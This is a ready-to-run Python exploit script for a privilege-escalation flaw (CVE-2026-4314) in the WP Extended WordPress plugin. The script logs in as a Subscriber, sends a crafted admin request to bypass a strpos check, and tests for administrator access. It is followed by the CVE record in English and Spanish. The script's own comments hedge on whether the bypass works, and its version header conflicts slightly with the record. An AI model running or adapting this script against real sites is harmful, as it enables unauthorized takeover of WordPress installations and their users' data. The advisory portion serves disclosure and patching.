CVE-2026-4314

# Exploit Title: WP Extended < 3.2.4 - Privilege Escalation (Subscriber to Admin) # Date: 2026-03-22 # Exploit Author: Analyst # Vendor Homepage: https://wpextended.com/ # Software Link: https://wordpress.org/plugins/wpextended/ # Version: <= 3.2.4 # CVE: CVE-2026-4314 import requests import sys def exploit(target_url, username, password): session = requests.Session() # 1. Login as a low-privileged user (Subscriber) login_endpoint = target_url + "/wp-login.php" login_data = { "log": username, "pwd": password, "redirect_to": target_url + "/wp-admin/", "wp-submit": "Log In", "testcookie": "1" } print("[*] Logging in as user: %s" % username) session.post(login_endpoint, data=login_data) # 2. Send crafted request to trigger privilege escalation # The vulnerability relies on 'strpos' checking REQUEST_URI. # Appending a keyword like 'profile' or 'dashboard' usually triggers the flaw. # Example: /wp-admin/admin.php?page=wpextended_settings&view=profile exploit_url = target_url + "/wp-admin/admin.php" params = { "page": "wpextended-menu", # Arbitrary page "action": "profile" # This parameter likely bypasses the strpos check } print("[*] Sending crafted payload to trigger grantVirtualCaps()...") response = session.get(exploit_url, params=params) if response.status_code == 200: print("[+] Request sent. Check if manage_options capability is granted.") # 3. Verify privileges by attempting to access options.php (admin only) options_check = session.get(target_url + "/wp-admin/options.php") if "options-general.php" in options_check.text: print("[+] SUCCESS! Privilege Escalation confirmed.") print("[+] You now have Administrator capabilities.") else: print("[-] Exploit failed or privileges not elevated.") else: print("[-] Target unreachable or error occurred.") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python exploit.py <target_url> <username> <password>") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2026-4314", "sourceIdentifier": "[email protected]", "published": "2026-03-22T04:16:26.180", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The 'The Ultimate WordPress Toolkit – WP Extended' plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.2.4. This is due to the `isDashboardOrProfileRequest()` method in the Menu Editor module using an insecure `strpos()` check against `$_SERVER['REQUEST_URI']` to determine if a request targets the dashboard or profile page. The `grantVirtualCaps()` method, which is hooked into the `user_has_cap` filter, grants elevated capabilities including `manage_options` when this check returns true. This makes it possible for authenticated attackers, with Subscriber-level access and above, to gain administrative capabilities by appending a crafted query parameter to any admin URL, allowing them to update arbitrary WordPress options and ultimately create new Administrator accounts."}, {"lang": "es", "value": "El plugin 'The Ultimate WordPress Toolkit – WP Extended' para WordPress es vulnerable a escalada de privilegios en todas las versiones hasta la 3.2.4, inclusive. Esto se debe a que el método `isDashboardOrProfileRequest()` en el módulo Editor de Menú utiliza una comprobación `strpos()` insegura contra `$_SERVER['REQUEST_URI']` para determinar si una solicitud apunta al panel de control o a la página de perfil. El método `grantVirtualCaps()`, que está enganchado al filtro `user_has_cap`, otorga capacidades elevadas, incluyendo `manage_options`, cuando esta comprobación devuelve verdadero. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, obtengan capacidades administrativas al añadir un parámetro de consulta manipulado a cualquier URL de administración, permitiéndoles actualizar opciones arbitrarias de WordPress y, en última instancia, crear nuevas cuentas de Administrador."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpextended/tags/3.2.4/modules/menu-editor/Bootstrap.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpextended/tags/3.2.4/modules/menu-editor/Bootstrap.php#L207", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old=3475963&old_path=wpextended%2Ftrunk%2Fmodules%2Fmenu-editor%2FBootstrap.php&new=&new_path=wpextended%2Ftrunk%2Fmodules%2Fmenu-editor%2FBootstrap.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/38ea001c-6edb-4f36-a7ec-19be1d857b9e?source=cve", "source": "[email protected]"}]}}